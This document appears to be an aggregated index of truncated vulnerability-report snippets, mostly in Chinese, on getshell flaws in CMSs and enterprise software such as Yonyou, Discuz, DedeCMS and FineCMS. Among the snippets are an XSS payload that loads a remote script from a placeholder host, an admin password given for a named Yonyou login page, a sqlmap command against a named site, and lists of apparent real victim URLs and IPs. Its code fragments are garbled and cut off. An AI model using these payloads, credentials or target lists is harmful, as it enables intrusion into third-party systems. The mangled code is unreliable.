天空教室选课通用管理系统任意文件上传漏洞

注册个教师发布课程账号，在2D课程选课列表上传中，可上传任意文件。可以GetShell...

用友CRM系统任意文件上传getshell（附众多案例）

简要描述： 用友CRM系统任意文件上传getshell（附众多案例），使用量非常大 详细说明： 用友CRM系统，使用量非常广，该系统存在任意文件上传,导致无限制getshell 存在漏洞的文件为 None...

Discuz! X-Series remote code execution vulnerability analysis-vulnerability warning-the black bar safety net

0x01 vulnerability root causes The root of the problem is that the api/uc. php file in the updatebadwords method, the code is as follows: function updatebadwords$get, $post global $G; if! APIUPDATEBADWORDS return APIRETURNFORBIDDEN; $data = array; ifisarray$post foreach$post as $k = $v...

fineCMS免费版xss getshell

简要描述： xss 详细说明： 注册一个用户，在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChilddocument.createElement'script'.src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的， 当管理员审核的时候触发漏洞 然后是getshell 有了后台xss都好办 在修改版权处 保存以后 漏洞证明：...

用友某管理系统后台弱口令已GetShell

简要描述： 用友某管理系统弱口令已GetShell 详细说明： http://vip.ufida.com.cn/nccsm/Admin.aspx admin sqbbagdp 进入后台发现有个编辑器 然后getshell 里面的数据太多了 漏洞证明： admin sqbbagdp 进入后台发现有个编辑器 然后getshell 里面的数据太多了...

discuz某插件设计缺陷可前台getshell（有较强条件限制）

简要描述： 设计缺陷 详细说明： discuz积分商城插件任意文件包含（最新版测试） 插件信息： http://addon.discuz.com/[email protected] 官方安装量3000+ （已经不少了吧） 关键字搜一下： 折腾了半天才搞定成功云平台服务。。终于可以装插件了。。。 测试环境： PHP 版本为: 5.2.9-2 magicquotesgpc = off 先看看代码吧： dcmall.inc.php漏洞文件 getdata; $sortid = dintval$GET'sortid'; ifempty$mallnav$sortid$sortid=0; @includ...

骑士CMS SQL注入前台GETSHELL

No description provided by source...

逐浪CMS2.4分分钟GetShell影响尚未发布的2.5Beta版

简要描述： Zoomla!逐浪CMS软件由上海逐一软件科技有限公司、江西逐浪软件科技有限公司联袂打造，其旗下华夏互联hx008.com开发团队，是华中排名第一的IDC服务商，拥有近十年的网站开发服务经验，一直以来致力于高端的WEB开发，也是国内领先的TOP外包合作商。 作为国产CMS的领先企业和国内首家推出的基于微软公司.NET平台的高端网站内核内容管理系统，Zoomla!逐浪CMS具备八大模块、近百项功能，深得业界好评。 在.NET平台开发的CMS行业，Zoomla!逐浪CMS与四川风讯CMS、北京百榕科技、佛山动易软件等公司，引领国产CMS行业的潮流，已成为业界事实标准。...

DedeCMS < 5.7-sp1 - Remote File Inclusion Vulnerability

Exploit for php platform in category web applications ========================== Exploit Title: Dedecms variable coverage leads to getshell Date: 26-06-2015 Vendor Homepage: http://www.dedecms.com/ Version: dedecms 5.7-sp1 and all old version CVE : CVE-2015-4553 ===========================...

DeDeCMS &lt; 5.7-sp1 - Remote File Inclusion

========================== Exploit Title: Dedecms variable coverage leads to getshell Date: 26-06-2015 Vendor Homepage: http://www.dedecms.com/ Version: dedecms 5.7-sp1 and all old version CVE : CVE-2015-4553 =========================== CVE-2015-4553Dedecms variable coverage leads to getshell...

DeDeCMS 5.7-sp1 - Remote File Inclusion

DeDeCMS 5.7-sp1 - Remote File Inclusion ========================== Exploit Title: Dedecms variable coverage leads to getshell Date: 26-06-2015 Vendor Homepage: http://www.dedecms.com/ Version: dedecms 5.7-sp1 and all old version CVE : CVE-2015-4553 =========================== CVE-2015-4553Dedecms...

CmsEasy getshell(略鸡肋)

简要描述： rt 详细说明： 利用条件：文章必须通过后台审核（必须列表审核），有点鸡肋了。 CmsEasy\lib\default\archiveact.php： 411行 showaction函数 里有句 if front::get't' == 'wap' $tpl = category::gettemplate$this-view-catid, 'showtemplatewap'; if!$tpl $tpl = 'wap/show.html'; $this-out$tpl; return; if $template && fileexistsTEMPLATE . '/'...

FineCMS免费版无限制GETshell

简要描述： 66666666666666FineCMS免费版无限制GETshell 详细说明： http://www.jwss.cc/?q=Powered%20by%20FineCMS%E5%85%8D%E8%B4%B9%E7%89%88&pn=100 案例：http://www.luyoutu.com/ http://www.qianjin998.com/ http://dery.cn/ http://www.xiaomixifan.cn/ http://www.yyxly.com/ http://mylhealth.com/ /plugins/mbak/ebak/index.php...

用友PDM Professional全版本通用型配置不当导致getshell

简要描述： rt 详细说明： 涉及： 用友PDM Professional 7.5 用友PDM Professional 6.5SP1 用友PDM Professional 7.2 用友PDM Professional 7.0 用友PDM Professional 6.0 详细看案例。 jboss未授权访问导致getshell None 漏洞证明：...

Whitney Walton Internet behavior management system Getshell without login-bug warning-the black bar safety net

This set of system after login, the vulnerability of many shallow dug several no sign of vulnerability here to submit an getshell it. Detailed description: Vulnerability file: base/sys/tcpdump.php code area The vulnerability is simple, direct command execution getshell, exp not attached, write to...

某农资市场监管系统远程命令执行漏洞

简要描述： rt 详细说明： 某农资市场监管系统远程命令执行漏洞。 案例： http://116.252.222.36:8080/aic/webnz/welcome-web-home!welcome.action http://61.133.211.45:8088/aic/webnz/welcome-web-home!welcome.action http://www.nmgs.gov.cn:7005/aic/webnz/welcome-web-home!welcome.action...

YXcms最新版任意文件删除导致花式getshell

简要描述： 某处任意删除导致花式getshell 来个雷好不好, --! 详细说明： 在用户上传头像的地方,已经上传了的用户如果再修改头像会删除之前的头像,相关代码如下： 在WOOYUN看到之前有人提交过,忽略了,但是程序里面却加上了验证代码, WooYun: YXcms最新版任意文件删除漏洞 但是没有用...没有循环替换,导致可以突破,如下图： 调试信息是我自己加的代码输出的, 可以看到当前上级目录的1.txt已经被删除, 然后我们开始花式getshell,首先删除重装锁定 重装以后在后台可以执行SQL语句,导致getshell1 https://imag...

Empire backup Wang(Empirebak) \class\functions.php and\class\combakfun.php GETSHELL vul-vulnerability warning-the black bar safety net

catalog 1. Vulnerability Description 2. Vulnerability trigger conditions 3. Vulnerability the range of 4. Vulnerability code analysis 5. Defense method 6. Offensive and defensive thinking 1. Vulnerability description EmpireBak is a completely free, dedicated to Mysql for big data backup with the...

金蝶某运维不当致服务器Getshell(影响内网+10+站点)

简要描述： ... 详细说明： 金蝶 站点：cms.kisdee.com IP： 118.194.40.103 Sqlmap.exe -u "http://cms.kisdee.com/yp/product.php?prowhere=1" -v 3 --dbms=mysql 注入 sqlmap identified the following injection points with a total of 23 HTTPs requests: --- Place: GET Parameter: prowhere Type: error-based Title: MySQL = 5.0...

Easy enterprise CMS specific case Getshell vulnerability analysis-vulnerability warning-the black bar safety net

Easy enterprise CMS（yiqicms is the domestic well-known marketing enterprise built Station system, based on PHP+MySQL development. Free and open source, on SEO more friendly. Recently, Ali's patch monitoring platform Diviner monitoring to yiqicms in a particular case is Getshell vulnerabilities...